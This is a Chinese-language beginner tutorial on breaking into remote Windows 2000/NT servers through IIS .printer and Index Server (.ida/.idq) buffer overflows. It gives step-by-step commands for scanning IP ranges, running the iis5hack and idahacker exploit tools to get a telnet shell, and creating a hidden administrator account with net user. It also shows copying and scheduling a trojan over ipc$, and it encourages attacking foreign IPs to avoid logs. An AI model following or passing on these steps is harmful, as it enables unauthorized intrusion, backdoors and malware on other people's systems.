| 关键词: 漏洞 远程 rover IIS 一个 呵呵 命令 一些 idahacker 用户 |
远程入侵---溢出篇 教菜鸟入侵--溢出篇 淘气精灵这是我的第一篇教程,呵呵~大家给点掌声,我在这里把我的一些经验告诉大家。这里说的入侵说得是2000或NT首先,介绍几个要用的命令------------------------- net user rover rover1234 /add在远程主机上创建用户rover密码rover1234(受限)net localgroup administrators rover /add把rover用户添道administrators组(这就成了超级管理员了,呵呵)注意:要使这两条命令成功,必须是ADMIN权限,TELNET登陆,QL的sa密码,IIS远程命令行,都可以的,但ipc$不行,因为~~这个~~好像ipc是本地shell吧,反正不可能啦---------------------------------net use \\ip\ipc$ "rover1234" /user:"rover"建立ipc$链接 用户rover密码rover1234copy rover.exe \\ip\admin$\system32把根目录下的准备好的rover.exe传道远程主机system32目录下netsvc \\ip schedule /start用小榕的netsvc打开对方的时间服务(netsvc必须放在DOS根目录下)net time 看时间^_^at \\ip XX:XX rover.exe在xx:xx------------------------------呵呵~这些都是获取可写权限后要打的命令好了,不罗嗦了,唉,这是菜鸟教程,不要说我罗嗦,我是很努力要你们懂啊现在说入侵介绍一个扫描工具“X-SCANR”现在好像最新的是V2.3吧随便扫上一段IP,10个ip 至少一半主机有漏洞,(建议扫外国的ip漏洞,安全、不用清日志^_^而且漏洞特多)那么多的扫描选项!~~为了节省我们的时间和金钱 x-scanr 设置--》扫描模块--》把端口和iis漏洞打勾其余的去掉,因为我下面介绍的是iis溢出漏洞 ,在扫描参数设置扫描IP断就可以工作了我们要找得是--》------------------------------可能存在"IIS 5.0 .printer远程缓冲区溢出"漏洞可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) ---------------------------------只要能扫到这三个里面的一个,那么我们就有60%的成功机会了,呵呵~超级管理员A~ 先说IIS 5.0 .printer漏洞,好像去年5月公布的,很有前途啊,呵呵~~先http://www.sunx.org去下载一个几K的小工具 -iis5hacker.exe顺便也把idahacker.exe拉下来,一会儿要用把这两个工具放在dos根目录下,因为是在dos下运行的c:\document. and settings\rover\--这是我的默认dos目录,你把它放在rover文件夹里就可以调用介绍一下iis5hacker的命令格式iis5hack 中文WIN2K: 0中文WIN2K sp1: 1英文WIN2K: 2英文WIN2K, sp1: 3日文WIN2K: 4日文WIN2K, sp1: 5现在记好你扫到的那个IIS 5.0 .printer远程缓冲区溢出漏洞的IP,准备溢出c:\document. and settings\rover\iss5hacker ip 80 0 99如果显示--》E:\HACK\print>iis5hack ip 80 3iis5 remote .printer overflow. writen by sunxhttp://www.sunx.orgfor test only, dont used to hack, :pconnecting...sending...Now you can telnet to 99 portgood luck :)就说明你溢出成功了,可以从99端口telnet登录,恭喜继续c:\document. and settings\rover\telnet ip 99Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:\WINNT\system32>看见了吧,进入远程主机了,呵呵,现在可是超级管理员权限啊~~这个溢出的99端口存活的时间很短,大概几分钟吧,创建用户足够了,用我前面介绍的net命令创建超级管理员,呵呵~~然后用ipc管道种木马,其实有比较简单的方法,流光自带一个ipc种植者,添上“ip 用户 密码 选择文件”然后开始 就会自动植入运行现在介绍下一个漏洞,这两个有一个就行了,一般他们是成对出现的^_^---------------------------可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) -----------------------------使用idahacker.exe格式idahacker 和iis5hacker差不多主机类型你自己看,打入idahacker /?eg.c:\document. and settings\rover\idahacker ip 80 1 99好了,下面不用我说吧。这个也是建立一个端口是99的telnet还有很重要的一点你用上两种方法telnet上去,建立超级用户后一定要正常退出,不然iis会死掉退出方法---》C:\WINNT\system32>exit就是用exit了,然后显示已断开与主机的连接,回到自己机子的提示符下了还有我给初学者的一些建议,我自己也算是初学者吧,我只是说一下个人体会:1。不要老是依赖一些智能工具,至少你依赖的时候知道他的基本原理,不然你永远不会提高2。不要老是以为自己可以用一些QQ炸弹之类的玩具而沾沾自喜,那是很无聊的事情,并且它并不会给你带来什 么,它只会让网上的一些高手小瞧你,hacker没有那么简单3。关于QQ,在黑白屋里好多人找我要QQ,还有人发一些放QQ,盗QQ之类的帖子,但我真想不出要那么多QQ干什 么用,有些人就是靠QQ来联系的,盗QQ并不是一个hacker应有的作风╭∩╮(︶︿︶)╭∩╮鄙视你!! 4。如果你觉得对2000和NT很熟了,那恭喜你。建议再去学unix或linux,网络的鼻祖5。至少学一门编程语言,初学者建议学VB,不提倡一开始就学C |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|